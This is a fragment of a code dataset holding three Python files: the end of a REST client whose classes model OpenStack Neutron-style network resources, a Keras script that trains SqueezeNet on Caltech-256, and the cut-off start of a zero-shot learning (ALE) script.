self._form_table()\n else:\n # single table\n self.add_column(list(json.keys()))\n self.add_column(list(json.values()))\n self._form_table()\n def _form_table(self):\n self.pretty = []\n col = len(self.column)\n raw = len(max(self.column, key=len))\n total = 0\n head = '+'\n for i in range(raw):\n pretty = '|'\n for j in range(col):\n max_item = max(self.column[j], key=len)\n pretty = '{0}{1}{2:<{len}}|'.format(pretty, ' '*self.indent, self.column[j][i],\n len=len(max_item) + self.indent)\n if len(head) != total:\n head = \"{0}{1}+\".format(head, '-'*(len(max_item)+self.indent*2))\n total = len(pretty)\n self.pretty.append(pretty)\n self.table = '\\n'.join([self.table, head, '\\n'.join(self.pretty), head])\n def __str__(self):\n return self.table\n\n# read json have '#' as comment and strip comment\ndef read_comment_json(file):\n text = ''\n with open(file, 'r') as f:\n all_lines = f.readlines()\n comment = re.compile('\\s*//')\n for line in all_lines:\n if not re.match(comment, line):\n text += line\n return text\n\ndef auth_from_file():\n auth_config = None\n path = os.path.dirname(os.path.abspath(__file__))\n auth_file = path + '/auth.json'\n if os.path.exists(auth_file):\n auth_text = read_comment_json(auth_file)\n auth_config = json.loads(auth_text)\n return auth_config\n\ndef pasrse_config_file(config_file=None):\n auth = {}\n config = None\n auth_config = auth_from_file()\n if config_file:\n text = read_comment_json(config_file)\n config = json.loads(text)\n if not auth_config:\n auth_config = config\n if auth_config:\n auth['auth_host'] = auth_config['auth_host']\n auth['host'] = auth_config['host'] if 'host' in auth_config else auth['auth_host']\n auth['user'] = auth_config['user'] if 'user' in auth_config else 'admin'\n auth['password'] = auth_config['password'] if 'password' in auth_config else None\n auth['project'] = auth_config['project'] if 'project' in auth_config else 'admin'\n auth['version'] = auth_config['version'] if 'version' in auth_config else 'v2'\n auth['auth_port'] = auth_config['auth_port'] if 'auth_port' in auth_config else '5000'\n port = 8082\n method = 'get'\n api = '/'\n body = {}\n if config:\n if 'auth_host' in config:\n auth['auth_host'] = config['auth_host']\n if 'auth_port' in config:\n auth['auth_port'] = config['auth_port']\n if 'user' in config:\n auth['user'] = config['user']\n if 'password' in config:\n auth['password'] = config['password']\n if 'project' in config:\n auth['project'] = config['project']\n if 'version' in config:\n auth['version'] = config['version']\n if 'host' in config:\n auth['host'] = config['host']\n if 'port' in config:\n port = config['port']\n if 'method' in config:\n method = config['method']\n if 'api' in config:\n api = config['api']\n if 'body' in config:\n body = config['body']\n if 'header' in config:\n auth['header'] = {}\n headers = config['header'].split(';')\n for header in headers:\n head = header.split(':')\n if len(head) > 1:\n auth['header'][head[0]] = head[1]\n auth['port'] = port\n auth['method'] = method\n auth['api'] = api\n auth['body'] = body\n return auth\n\nclass ResBase():\n def __init__(self):\n self.url = None\n self.body = {}\n\nclass Resource():\n def __init__(self, res_type, res_id=None, name=None):\n self._type = res_type\n self._id = res_id\n self._name = name\n self.url = '/neutron/' + self._type\n self.resource = { 'tenant_id': 'ad88dd5d24ce4e2189a6ae7491c33e9d' }\n if self._id:\n self.resource['id'] = self._id\n if self._name:\n self.resource['name'] = self._name\n self.data = {\n 'fields': [],\n 'resource': self.resource,\n 'id': self.id,\n 'filters': {}\n }\n self.context = {\n 'user_id': '44faef681cd34e1c80b8520dd6aebad4',\n 'tenant_id': 'ad88dd5d24ce4e2189a6ae7491c33e9d',\n 'is_admin': True,\n 'request_id': 'req-' + str(uuid.uuid1()),\n 'operation': 'READALL',\n 'type': self._type\n }\n\n @property\n def type(self):\n return self._type\n\n @property\n def name(self):\n return self._name\n @name.setter\n def name(self, value):\n self._name = value\n self.resource['name'] = value\n\n @property\n def id(self):\n return self._id\n @id.setter\n def id(self, value):\n self._id = value\n self.data['id'] = value\n self.resource['id'] = value\n\n @property\n def filters(self):\n return self.data.get('filters')\n @filters.setter\n def filters(self, value):\n self.data['filters'] = value\n\n @property\n def fields(self):\n return self.data.get('fields')\n @fields.setter\n def fields(self, value):\n self.data['fields'] = value\n\n @property\n def shared(self):\n return self.resource.get('shared')\n @shared.setter\n def shared(self, value):\n self.resource['shared'] = value\n\n @property\n def enabled(self):\n return self.resource.get('admin_state_up')\n @enabled.setter\n def enabled(self, value):\n self.resource['admin_state_up'] = value\n\n @property\n def oper(self):\n return self.context.get('operation')\n @oper.setter\n def oper(self, oper):\n self.context['operation'] = oper\n\n @property\n def body(self):\n self._body = {'data': self.data, 'context': self.context}\n return self._body\n\nclass VirtualNetwork(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('network', res_id=res_id, name=name)\n\n @property\n def external(self):\n return self.resource.get('router:external')\n @external.setter\n def external(self, value):\n self.resource['router:external'] = value\n if self.resource['router:external']:\n self.resource['provider:network_type'] = 'vlan'\n else:\n self.resource['provider:network_type'] = 'vxlan'\n\n @property\n def segment(self):\n return self.resource.get('provider:segmentation_id')\n @segment.setter\n def segment(self, value):\n self.resource['provider:segmentation_id'] = value\n\nclass Subnet(Resource):\n def __init__(self, network=None, res_id=None, name=None):\n super().__init__('subnet', res_id=res_id, name=name)\n self.resource['network_id'] = network\n\n @property\n def net(self):\n return self.resource.get('network_id')\n @net.setter\n def net(self, value):\n self.resource['network_id'] = value\n @property\n def cidr(self):\n return self.resource.get('cidr')\n @cidr.setter\n def cidr(self, value):\n self.resource['cidr'] = value\n @property\n def dhcp(self):\n return self.resource.get('enable_dhcp')\n @dhcp.setter\n def dhcp(self, value):\n self.resource['enable_dhcp'] = value\n @property\n def gateway(self):\n return self.resource.get('gateway_ip')\n @gateway.setter\n def gateway(self, value):\n self.resource['gateway_ip'] = value\n def add_alloc_pool(self, start, end):\n pool = self.resource.get('allocation_pools')\n if pool:\n pool.append({'start': start, 'end': end})\n else:\n pool = [{'start': start, 'end': end}]\n self.resource['allocation_pools'] = pool\n\nclass Port(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('port', res_id=res_id, name=name)\n\n @property\n def net(self):\n return self.resource.get('network_id')\n @net.setter\n def net(self, value):\n self.resource['network_id'] = value\n @property\n def subnet(self):\n fixed_ips = self.resource.get('fixed_ips')\n if fixed_ips:\n return fixed_ips.get('subnet_id')\n @subnet.setter\n def subnet(self, value):\n if 'fixed_ips' in self.resource:\n self.resource['fixed_ips'][0]['subnet_id'] = value\n else:\n self.resource['fixed_ips'] = [{'subnet_id': value}]\n @property\n def ip(self):\n fixed_ips = self.resource.get('fixed_ips')\n if fixed_ips:\n return fixed_ips.get('ip_address')\n @ip.setter\n def ip(self, value):\n if 'fixed_ips' in self.resource:\n self.resource['fixed_ips'][0]['ip_address'] = value\n else:\n self.resource['fixed_ips'] = [{'ip_address': value}]\n @property\n def security_groups(self):\n return self.resource.get('security_groups')\n @security_groups.setter\n def security_groups(self, value):\n self.resource['security_groups'] = value\n @property\n def qos(self):\n return self.resource.get('qos')\n @qos.setter\n def qos(self, value):\n self.resource['qos'] = value\n\nclass Router(Resource):\n class PortForwording():\n def __init__(self, protocol, vm_ip, vm_port, public_port, status='enable'):\n self.status = status.upper()\n self.vm_ip = vm_ip\n self.vm_port = vm_port\n self.protocol = protocol\n self.public_port = public_port\n\n def __init__(self, res_id=None, name=None):\n super().__init__('router', res_id=res_id, name=name)\n self._external = None\n\n @property\n def net(self):\n if self._external:\n return self.resource['external_gateway_info'].get('network_id')\n @net.setter\n def net(self, value):\n if self._external:\n self.resource['external_gateway_info']['network_id'] = value\n else:\n self.resource['external_gateway_info'] = {'network_id': value}\n self._external = self.resource['external_gateway_info']\n @property\n def fixed_ip(self):\n return self.resource.get('external_fixed_ips')\n @fixed_ip.setter\n def fixed_ip(self, value):\n if self._external:\n self.resource['external_gateway_info']['external_fixed_ips'] = value\n self.resource['external_gateway_info'] = {\n 'external_fixed_ips': value\n }\n @property\n def gateway(self):\n return self.resource.get('external_gateway_info')\n @gateway.setter\n def gateway(self, value):\n self.resource['external_gateway_info'] = value\n @property\n def subnet(self):\n return self.resource.get('subnet_id')\n @subnet.setter\n def subnet(self, value):\n self.resource['subnet_id'] = value\n @property\n def portforward(self):\n return self.resource.get('portforwardings')\n @portforward.setter\n def portforward(self, value):\n if not value:\n self.resource['portforwardings'] = None\n return\n portforwarding = value.__dict__\n if self.resource.get('portforwardings'):\n self.resource['portforwardings'].append(portforwarding)\n else:\n self.resource['portforwardings'] = [portforwarding]\n\nclass LoadBalancer(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('loadbalancer', res_id=res_id, name=name)\n @property\n def subnet(self):\n return self.resource.get('vip_subnet_id')\n @subnet.setter\n def subnet(self, value):\n self.resource['vip_subnet_id'] = value\n @property\n def vip(self):\n return self.resource.get('vip_address')\n @vip.setter\n def vip(self):\n self.resource['vip_address'] = value\n @property\n def provider(self):\n return self.resource.get('provider')\n @provider.setter\n def provider(self, value):\n self.resource['provider'] = value\n @property\n def cluster(self):\n return self.resource.get('cluster')\n @cluster.setter\n def cluster(self, value):\n self.resource['cluster'] = value\n @property\n def listeners(self):\n return self.resource.get('listeners')\n @listeners.setter\n def listeners(self, value):\n self.resource['listeners'] = value\n @property\n def pools(self):\n return self.resource.get('pools')\n @pools.setter\n def pools(self, value):\n self.resource['pools'] = value\n\nclass LoadBalanceListener(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('listener', res_id=res_id, name=name)\n @property\n def lb(self):\n return self.resource.get('loadbalancer_id')\n @lb.setter\n def lb(self, value):\n self.resource['loadbalancer_id'] = value\n @property\n def protocol(self):\n return self.resource.get('protocol')\n @protocol.setter\n def protocol(self, value):\n self.resource['protocol'] = value\n @property\n def port(self):\n return self.resource.get('protocol_port')\n @port.setter\n def port(self, value):\n self.resource['protocol_port'] = int(value)\n\nclass LoadBalancePool(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('pool', res_id=res_id, name=name)\n @property\n def lb(self):\n return self.resource.get('loadbalancer_id')\n @lb.setter\n def lb(self, value):\n self.resource['loadbalancer_id'] = value\n @property\n def listener(self):\n return self.resource.get('listener_id')\n @listener.setter\n def listener(self, value):\n self.resource['listener_id'] = value\n @property\n def protocol(self):\n return self.resource.get('protocol')\n @protocol.setter\n def protocol(self, value):\n self.resource['protocol'] = value\n @property\n def algorithm(self):\n return self.resource.get('lb_algorithm')\n @algorithm.setter\n def algorithm(self, value):\n self.resource['lb_algorithm'] = value\n\nclass LoadBalanceMember(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('member', res_id=res_id, name=name)\n @property\n def pool(self):\n return self.resource.get('pool_id')\n @pool.setter\n def pool(self, value):\n self.url = self.url.replace('member', f'pool/{value}/member')\n self.resource['pool_id'] = value\n @property\n def subnet(self):\n return self.resource.get('subnet_id')\n @subnet.setter\n def subnet(self, value):\n self.resource['subnet_id'] = value\n @property\n def port(self):\n return self.resource.get('protocol_port')\n @port.setter\n def port(self, value):\n self.resource['protocol_port'] = int(value)\n @property\n def ip(self):\n return self.resource.get('address')\n @ip.setter\n def ip(self, value):\n self.resource['address'] = value\n\nclass LoadBalanceHealthMonitor(Resource):\n def __init__(self, pool=None, res_id=None, name=None):\n super().__init__('healthmonitor', res_id=res_id, name=name)\n self.pool = pool\n self.protocol = 'TCP'\n self.timeout = 10\n self.delay = 60\n self.max_retries = 3\n\n @property\n def pool(self):\n return self.resource.get('pool_id')\n @pool.setter\n def pool(self, value):\n self.resource['pool_id'] = value\n @property\n def protocol(self):\n return self.resource.get('type')\n @protocol.setter\n def protocol(self, value):\n self.resource['type'] = value\n @property\n def delay(self):\n return self.reource.get('delay')\n @delay.setter\n def delay(self, value):\n self.resource['delay'] = value\n @property\n def timeout(self):\n return self.resource.get('timeout')\n @timeout.setter\n def timeout(self, value):\n self.resource['timeout'] = value\n @property\n def max_retries(self):\n return self.resource.get('max_retries')\n @max_retries.setter\n def max_retries(self, value):\n self.resource['max_retries'] = value\n\nclass Firewall(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('firewall_group', res_id=res_id, name=name)\n @property\n def policys(self):\n return self.resource.get('firewall_policy_ids')\n @policys.setter\n def policys(self, value):\n self.resource['firewall_policy_ids'] = value\n @property\n def projects(self):\n return self.resource.get('projects')\n @projects.setter\n def projects(self, value):\n self.resource['projects'] = value\n @property\n def ports(self):\n return self.resource.get('ports')\n @ports.setter\n def ports(self, value):\n self.resource['ports'] = value\n @property\n def networks(self):\n return self.resource.get('networks')\n @networks.setter\n def networks(self, value):\n self.resource['networks'] = value\n\nclass FwPolicy(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('firewall_policy', res_id=res_id, name=name)\n @property\n def rules(self):\n return self.resource.get('firewall_rules')\n @rules.setter\n def rules(self, value):\n self.resource['firewall_rules'] = value\n @property\n def audited(self):\n return self.resource.get('audited')\n @audited.setter\n def audited(self, value):\n self.resource['audited'] = value\n @property\n def rule(self):\n return self.resource.get('firewall_rule_id')\n @rule.setter\n def rule(self, value):\n self.resource['firewall_rule_id'] = value\n @property\n def insert_before(self):\n return self.resource.get('insert_before')\n @insert_before.setter\n def insert_before(self, value):\n self.resource['insert_before'] = value\n\nclass FwRule(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('firewall_rule', res_id=res_id, name=name)\n @property\n def src_ip(self):\n return self.resource.get('source_ip_address')\n @src_ip.setter\n def src_ip(self, value):\n self.resource['source_ip_address'] = value\n @property\n def dest_ip(self):\n return self.resource.get('destination_ip_address')\n @dest_ip.setter\n def dest_ip(self, value):\n self.resource['destination_ip_address'] = value\n @property\n def src_port(self):\n return self.resource.get('source_port')\n @src_port.setter\n def src_port(self, value):\n self.resource['source_port'] = value\n @property\n def dest_port(self):\n return self.resource.get('destination_port')\n @dest_port.setter\n def dest_port(self, value):\n self.resource['destination_port'] = value\n @property\n def protocol(self):\n return self.resource.get('protocol')\n @protocol.setter\n def protocol(self, value):\n self.resource['protocol'] = value\n @property\n def version(self):\n return self.resource.get('ip_version')\n @version.setter\n def version(self, value):\n self.resource['ip_version'] = value\n @property\n def action(self):\n return self.resource.get('action')\n @action.setter\n def action(self, value):\n self.resource['action'] = value\n @property\n def enabled(self):\n return self.resource.get('enabled')\n @enabled.setter\n def enabled(self, value):\n self.resource['enabled'] = value\n\nclass IkePolicy(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('ike_policy', res_id=res_id, name=name)\n @property\n def auth_algorithm(self):\n return self.resource.get('auth_algorithm')\n @auth_algorithm.setter\n def auth_algorithm(self, value):\n self.resource['auth_algorithm'] = value\n @property\n def encryption_algorithm(self):\n return self.resource.get('encryption_algorithm')\n @encryption_algorithm.setter\n def encryption_algorithm(self, value):\n self.resource['encryption_algorithm'] = value\n @property\n def ike_version(self):\n return self.resource.get('ike_version')\n @ike_version.setter\n def ike_version(self, value):\n self.resource['ike_version'] = value\n\nclass IpsecPolicy(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('ipsec_policy', res_id=res_id, name=name)\n @property\n def auth_algorithm(self):\n return self.resource.get('auth_algorithm')\n @auth_algorithm.setter\n def auth_algorithm(self, value):\n self.resource['auth_algorithm'] = value\n @property\n def encryption_algorithm(self):\n return self.resource.get('encryption_algorithm')\n @encryption_algorithm.setter\n def encryption_algorithm(self, value):\n self.resource['encryption_algorithm'] = value\n @property\n def transform_protocol(self):\n return self.resource.get('transform_protocol')\n @transform_protocol.setter\n def transform_protocol(self, value):\n self.resource['transform_protocol'] = value\n\nclass VpnEndpiointGroup(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('vpn_endpoint_group', res_id=res_id, name=name)\n @property\n def endpoints(self):\n return self.resource.get('endpoints')\n @endpoints.setter\n def endpoints(self, value):\n self.resource['endpoints'] = value\n @property\n def endpoint_type(self):\n return self.resource.get('endpoint_type')\n @endpoint_type.setter\n def endpoint_type(self, value):\n self.resource['endpoint_type'] = value\n\nclass VpnService(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('vpn_service', res_id=res_id, name=name)\n @property\n def router(self):\n return self.resource.get('router_id')\n @router.setter\n def router(self, value):\n self.resource['router_id'] = value\n\nclass VpnConnection(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('ipsec_site_connection', res_id=res_id, name=name)\n @property\n def ike(self):\n return self.resource.get('ike_policy_id')\n @ike.setter\n def ike(self, value):\n self.resource['ike_policy_id'] = value\n @property\n def ipsec(self):\n return self.resource.get('ipsec_policy_id')\n @ipsec.setter\n def ipsec(self, value):\n self.resource['ipsec_policy_id'] = value\n @property\n def service(self):\n return self.resource.get('vpn_service_id')\n @service.setter\n def service(self, value):\n self.resource['vpn_service_id'] = value\n @property\n def peer_ip(self):\n return self.resource.get('peer_address')\n @peer_ip.setter\n def peer_ip(self, value):\n self.resource['peer_address'] = value\n @property\n def peer_id(self):\n return self.resource.get('peer_id')\n @peer_id.setter\n def peer_id(self, value):\n self.resource['peer_id'] = value\n @property\n def psk(self):\n return self.resource.get('psk')\n @psk.setter\n def psk(self, value):\n self.resource['psk'] = value\n @property\n def local_endpoint(self):\n return self.resource.get('local_ep_group_id')\n @local_endpoint.setter\n def local_endpoint(self, value):\n self.resource['local_ep_group_id'] = value\n @property\n def peer_endpoint(self):\n return self.resource.get('peer_ep_group_id')\n @peer_endpoint.setter\n def peer_endpoint(self, value):\n self.resource['peer_ep_group_id'] = value\n\nclass VpnP2SConnection(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('ipsec_p2s_connection', res_id=res_id, name=name)\n @property\n def auth_mode(self):\n return self.resource.get('auth_mode')\n @auth_mode.setter\n def auth_mode(self, value):\n self.resource['auth_mode'] = value\n @property\n def cert(self):\n return self.resource.get('ca_cert')\n @cert.setter\n def cert(self, value):\n self.resource['ca_cert'] = value\n @property\n def server_key(self):\n return self.resource.get('server_key')\n @server_key.setter\n def server_key(self, value):\n self.resource['server_key'] = value\n @property\n def server_cert(self):\n return self.resource.get('server_cert')\n @server_cert.setter\n def server_cert(self, value):\n self.resource['server_cert'] = value\n @property\n def service(self):\n return self.resource.get('vpn_service_id')\n @service.setter\n def service(self, value):\n self.resource['vpn_service_id'] = value\n @property\n def exp_cert_list(self):\n return self.resource.get('crl_list')\n @exp_cert_list.setter\n def exp_cert_list(self, value):\n self.resource['crl_list'] = value\n @property\n def local_subnets(self):\n return self.resource.get('local_subnets')\n @local_subnets.setter\n def local_subnets(self, value):\n self.resource['local_subnets'] = value\n @property\n def address_pool(self):\n return self.resource.get('address_pool')\n @address_pool.setter\n def address_pool(self, value):\n self.resource['address_pool'] = value\n @property\n def tcp_mss(self):\n return self.resource.get('tcp_mss')\n @tcp_mss.setter\n def tcp_mss(self, value):\n self.resource['tcp_mss'] = value\n @property\n def dpd(self):\n return self.resource.get('dpd')\n @dpd.setter\n def dpd(self, value):\n self.resource['dpd'] = value\n\nclass Qos(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('qos', res_id=res_id, name=name)\n @property\n def direction(self):\n return self.resource.get('direction')\n @direction.setter\n def direction(self, value):\n self.resource['direction'] = value\n @property\n def rate(self):\n return self.resource.get('max_rate')\n @rate.setter\n def rate(self, value):\n self.resource['max_rate'] = value\n\nclass IpGroup(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('ipgroup', res_id=res_id, name=name)\n @property\n def net(self):\n return self.resource.get('network_id')\n @net.setter\n def net(self, value):\n self.resource['network_id'] = value\n @property\n def ip(self):\n return self.resource.get('ips')\n @ip.setter\n def ip(self, value):\n self.resource['ips'] = value\n @property\n def protocol(slef):\n return self.resource.get('protocol')\n @protocol.setter\n def protocol(slef, value):\n self.resource['protocol'] = value\n @property\n def port(self):\n return self.resource.get('ports')\n @port.setter\n def port(self, value):\n self.resource['ports'] = value\n @property\n def ratelimit(self):\n return self.resource.get('qos')\n @ratelimit.setter\n def ratelimit(self, value):\n self.resource['qos'] = value\n\nclass Provider(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('net_provider', res_id=res_id, name=name)\n @property\n def interfaces(self):\n return self.resource.get('interfaces')\n @interfaces.setter\n def interfaces(self, value):\n self.resource['interfaces'] = value\n\nclass FloatingIP(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('floatingip', res_id=res_id, name=name)\n @property\n def net(self):\n return self.resource.get('floating_network_id')\n @net.setter\n def net(self, value):\n self.resource['floating_network_id'] = value\n @property\n def subnet(self):\n return self.resource.get('subnet_id')\n @subnet.setter\n def subnet(self, value):\n self.resource['subnet_id'] = value\n @property\n def ip(self):\n return self.resource.get('floating_ip_address')\n @ip.setter\n def ip(self, value):\n self.resource['floating_ip_address'] = value\n @property\n def port(self):\n return self.resource.get('port_id')\n @port.setter\n def port(self, value):\n self.resource['port_id'] = value\n @property\n def fixed_ip(self):\n return self.resource.get('fixed_ip_address')\n @fixed_ip.setter\n def fixed_ip(self, value):\n self.resource['fixed_ip_address'] = value\n\nclass SecurityGroup(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('security_group', res_id=res_id, name=name)\n @property\n def rules(self):\n return self.resource.get('security_group_rules')\n @rules.setter\n def rules(self, value):\n self.resource['security_group_rules'] = value\n\nclass SecurityGroupRule(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('security_group_rule', res_id=res_id, name=name)\n @property\n def group(self):\n return self.resource.get('security_group_id')\n @group.setter\n def group(self, value):\n self.resource['security_group_id'] = value\n\nclass PhysicalRouter(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('physical_router', res_id=res_id, name=name)\n @property\n def mgmt_ip(self):\n return self.resource.get('management_ip')\n @mgmt_ip.setter\n def mgmt_ip(self, value):\n self.resource['management_ip'] = value\n @property\n def snmp(self):\n return self.resource.get('snmp_credentials')\n @snmp.setter\n def snmp(self, value):\n self.resource['snmp_credentials'] = value\n @property\n def router_type(self):\n return self.resource.get('virtual_router_type')\n @router_type.setter\n def router_type(self, value):\n self.resource['virtual_router_type'] = value\n @property\n def connect_check(self):\n return self.resource.get('virtual_router_type')\n @connect_check.setter\n def connect_check(self, value):\n self.resource['virtual_router_type'] = value\n\nclass Tag(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('tag', res_id=res_id, name=name)\n @property\n def type_name(self):\n return self.resource.get('type_name')\n @type_name.setter\n def type_name(self, value):\n self.resource['type_name'] = value\n @property\n def value(self):\n return self.resource.get('value')\n @value.setter\n def value(self, value):\n self.resource['value'] = value\n\nclass ServiceGroup(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('service_group', res_id=res_id, name=name)\n\nclass AddressGroup(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('address_group', res_id=res_id, name=name)\n\nclass SegFirewall(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('segment_firewall_group', res_id=res_id, name=name)\n\nclass SegFirewallPolicy(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('segment_firewall_policy', res_id=res_id, name=name)\n\nclass SegFirewallRule(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('segment_firewall_rule', res_id=res_id, name=name)\n\nclass IpAM(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('ipam', res_id=res_id, name=name)\n\nclass Node(Resource):\n def __init__(self, res_id=None, name=None):\n super().__init__('node', res_id=res_id, name=name)\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n pass\n","sub_path":"rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":110459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"448347860","text":"# -*- coding: utf-8 -*-\n\n#%% \nimport keras\nimport numpy as np\nfrom keras.applications import imagenet_utils\n#import mxnet as mx\n# %% Loading Caltech 256\ncaltech256_train = '/home/djn/Datasets/caltech256/train'\ncaltech256_test = '/home/djn/Datasets/caltech256/test'\n\ndef caltech_preprocessing(x):\n return imagenet_utils.preprocess_input(x, mode='tf')\n\npicgen = keras.preprocessing.image.ImageDataGenerator(\n horizontal_flip=True,\n fill_mode='nearest',\n width_shift_range=0.2,\n height_shift_range=0.2,\n preprocessing_function=caltech_preprocessing\n)\n\ntrain_gen = picgen.flow_from_directory(caltech256_train,\n target_size=(64, 64),\n batch_size=32\n )\nval_gen = picgen.flow_from_directory(caltech256_test,\n target_size=(64, 64),\n batch_size=32)\n# %% See what we have\n\nnp_rng = np.random.RandomState(1)\npic = train_gen[0][0][0].astype(np.uint8)\n\ninput_shape = pic.shape\nn_classes = len(train_gen.class_indices)\n\n# %%\ndef ConvBNBlock(filters, kernel_size, strides=(1, 1), regularizer=None, padding='same', activation='relu', bn=True):\n\n channel_axis = keras.backend.image_data_format()\n if channel_axis == 'channels_first':\n canary = 1\n else:\n canary = 3\n def convbn(x):\n out = x\n out = keras.layers.Conv2D(filters, kernel_size, strides=strides, padding=padding, kernel_regularizer=regularizer, bias_regularizer=regularizer)(out)\n if bn:\n out = keras.layers.BatchNormalization(axis=canary)(out)\n out = keras.layers.Activation(activation)(out)\n\n return out\n\n return convbn\n\ndef FireBlock(s1_filters, e1_filters, e3_filters):\n channel_axis = keras.backend.image_data_format()\n if channel_axis == 'channels_first':\n canary = 1\n else:\n canary = 3\n def fire(x):\n squeezed = ConvBNBlock(s1_filters, (1, 1))(x)\n\n expand_1 = ConvBNBlock(e1_filters, (1, 1))(squeezed)\n expand_3 = ConvBNBlock(e1_filters, (3, 3))(squeezed)\n\n out = keras.layers.Concatenate(axis=canary)([expand_1, expand_3])\n\n return out\n\n return fire\n\n\ndef uniform_label_smoothing(onehot_label, weight):\n smoothed = onehot_label\n n_classes = smoothed.shape[1]\n smoothed *= 1.0 - weight\n smoothed += 1.0 / n_classes * weight\n\n return smoothed\n\ndef multiple_outputs(generator):\n while True:\n gnext = generator.next()\n smoothed = uniform_label_smoothing(gnext[1], 0.1)\n yield gnext[0], [smoothed]\n#%%\n\ndef build_squeezenet():\n channel_axis = keras.backend.image_data_format()\n if channel_axis == 'channels_first':\n canary = 1\n else:\n canary = 3\n\n input = keras.layers.Input(shape=input_shape)\n\n conved = ConvBNBlock(96, (3, 3), strides=(2, 2))(input)\n conved = keras.layers.MaxPool2D((3, 3), strides=(2, 2))(conved)\n\n conved = FireBlock(16, 64, 64)(conved)\n conved = FireBlock(16, 64, 64)(conved)\n conved = keras.layers.MaxPool2D((3, 3), strides=(2, 2))(conved)\n\n conved = FireBlock(32, 128, 128)(conved)\n conved = FireBlock(32, 128, 128)(conved)\n conved = keras.layers.MaxPool2D((3, 3), strides=(2, 2))(conved)\n\n conved = FireBlock(48, 192, 192)(conved)\n conved = FireBlock(48, 192, 192)(conved)\n conved = FireBlock(64, 256, 256)(conved)\n conved = FireBlock(64, 256, 256)(conved)\n\n conved = keras.layers.Dropout(0.5)(conved)\n conved = ConvBNBlock(n_classes, (1, 1))(conved)\n avg = keras.layers.GlobalAveragePooling2D()(conved)\n scores = keras.layers.Activation('softmax')(avg)\n\n model = keras.Model(inputs=input, outputs=[scores])\n\n sgd = keras.optimizers.SGD(lr=0.04, momentum=0.9)\n model.compile(loss='categorical_crossentropy',\n optimizer=sgd,\n metrics=['acc'])\n return model\n\n\n# %%\nimport os\nsqnet_name = 'SqueezeNet'\nif os.path.isfile(sqnet_name + '.h5'):\n squeezenet = keras.models.load_model(sqnet_name + '.h5')\n#else:\n#squeezenet = build_squeezenet()\n\n\nsqueezenet.summary()\n\nkeras.utils.plot_model(squeezenet, to_file=sqnet_name + '.png',\n show_shapes=True, show_layer_names=True)\n\n#%%\n\nchkpt = keras.callbacks.ModelCheckpoint(sqnet_name + '.h5', period=1, save_best_only=True)\nlrschedule = keras.callbacks.LearningRateScheduler(lambda epoch, lr: lr * 0.94 if (epoch+1) % 2 == 0 else lr, verbose=1)\n\ncallbacks = [chkpt, lrschedule]\nhist = squeezenet.fit_generator(multiple_outputs(train_gen), epochs=100, steps_per_epoch=len(train_gen),\nvalidation_data=multiple_outputs(val_gen), validation_steps=len(val_gen), callbacks=callbacks)\n\nimport pandas as pd\n\nhist_df = pd.DataFrame(hist.history)\nwith open(sqnet_name + '_hist.csv', mode='w') as f:\n hist_df.to_csv(f)\n","sub_path":"ML/tf/tf/ConvNets/SqueezeNet1.1.py","file_name":"SqueezeNet1.1.py","file_ext":"py","file_size_in_byte":4845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"200063506","text":"import numpy as np\nimport argparse\nfrom scipy import io, spatial\nimport time\nfrom random import shuffle\nimport random\nfrom sklearn import preprocessing\nfrom sklearn.metrics import confusion_matrix\n\nparser = argparse.ArgumentParser(description=\"GZSL with ALE\")\n\nparser.add_argument('-data', '--dataset', help='choose between APY, AWA2, AWA1, CUB, SUN', default='AWA2', type=str)\nparser.add_argument('-e', '--epochs', default=100, type=int)\nparser.add_argument('-es', '--early_stop', default=10, type=int)\nparser.add_argument('-norm', '--norm_type', help='std(standard), L2, None', default='std', type=str)\nparser.add_argument('-lr', '--lr', default=0.01, type=float)\nparser.add_argument('-mr', '--margin', default=1, type=float)\nparser.add_argument('-seed', '--rand_seed', default=42, type=int)\n\nclass ALE():\n\t\n\tdef __init__(self, args):\n\n\t\tself.args = args\n\n\t\trandom.seed(self.args.rand_seed)\n\t\tnp.random.seed(self.args.rand_seed)\n\n\t\tdata_folder = '../xlsa17/data/'+args.dataset+'/'\n\t\tres101 = io.loadmat(data_folder+'res101.mat')\n\t\tatt_splits=io.loadmat(data_folder+'att_splits.mat')\n\n\t\ttrain_loc = 'train_loc'\n\t\tval_loc = 'val_loc'\n\t\ttrainval_loc = 'trainval_loc'\n\t\ttest_seen_loc = 'test_seen_loc'\n\t\ttest_unseen_loc = 'test_unseen_loc'\n\n\t\tfeat = res101['features']\n\t\t# Shape -> (dxN)\n\t\tself.X_trainval_gzsl = feat[:, np.squeeze(att_splits[trainval_loc]-1)]\n\t\tself.X_test_seen = feat[:, 